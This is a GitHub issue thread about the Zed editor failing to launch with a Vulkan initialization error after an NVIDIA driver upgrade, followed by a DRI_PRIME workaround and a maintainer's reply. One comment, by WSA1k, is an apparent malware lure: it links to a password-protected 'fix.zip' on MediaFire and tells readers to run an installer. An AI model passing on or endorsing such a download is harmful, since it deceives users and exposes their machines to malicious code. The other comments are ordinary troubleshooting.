### ISSUE TITLE
Unable to launch Zed after NVML initialization failed

### ISSUE THREAD

**Issue by ZZzzaaKK** [zed-industries/zed#16863]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

After upgrading my NVIDIA drivers to a new major version (555.58.02-17 → 560.35.03-1), I was no longer able to launch Zed until I restarted my PC. Notably, trying to run `nvidia-smi` yielded the error "Failed to initialize NVML: Driver/library version mismatch" before the restart. I had no issues with any other applications, though, maybe because they were running on my integrated AMD graphics instead.

Here's the error I got when trying to run Zed from its CLI:
error opening [PathWithPosition { path: "/home/leaf/Code/zed", row: None, column: None }]: VulkanError(ERROR_INITIALIZATION_FAILED)

### Environment

Zed: v0.149.5 (Zed)
OS: Linux X11 arch unknown
Memory: 30.6 GiB
Architecture: x86_64
GPU: NVIDIA GeForce RTX 3060 Ti || NVIDIA || 560.35.03

Additional System Details:
CPU: AMD Ryzen™ 9 7950X3D
Graphics: AMD Radeon™ Graphics
GNOME: 46
Kernel: Linux 6.10.6-arch1-1

### If applicable, attach your Zed.log file to this issue.

[Zed.log](https://github.com/user-attachments/files/16746628/Zed.log)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by frasertajima** [comment]
I am running Fedora Silverblue 40 and ran into the same issue where Zed's desktop or command line would not run (with no indication as to why) after an OS upgrade and reboot. `zed --help` did work on the command line but `zed` would output nothing.

In my case Zed was not using the Nvidia GPU but was trying to use the Intel integrated GPU (previously, Zed always launched so something must have changed in the operating system, probably the new Nvidia 560 drivers as 555 drivers did not have this behaviour).  On the command line I typed:
```
export DRI_PRIME=1
zed
```
and then it launched. 

The `export DRI_PRIM=1` command forces use of the GPU. In the desktop shortcut responsible for application icons on the desktop, if using Gnome desktop, add that same command ahead of the executable under the `Exec=` line under the [Desktop Entry] section:
`Exec=env DRI_PRIME=1 /var/home/[user]/.local/zed.app/libexec/zed-editor %U`
The desktop entries file for applications are at `/var/home/[user]/.local/share/applications` in Fedora. (substitute your home user directory name for [user])

**Comment by ConradIrwin** [comment]
@frasertajima Thanks for the excellent idea on adding that to the desktop file. Would you feel comfortable adding it to https://github.com/zed-industries/zed/blob/f218f53ed6adb1460e51f9b69dbf7ce63bcb1da4/docs/src/linux.md#L106 the docs for others?

**Comment by frasertajima** [comment]
It has been a while since I did this. Hope it went through and was ok.
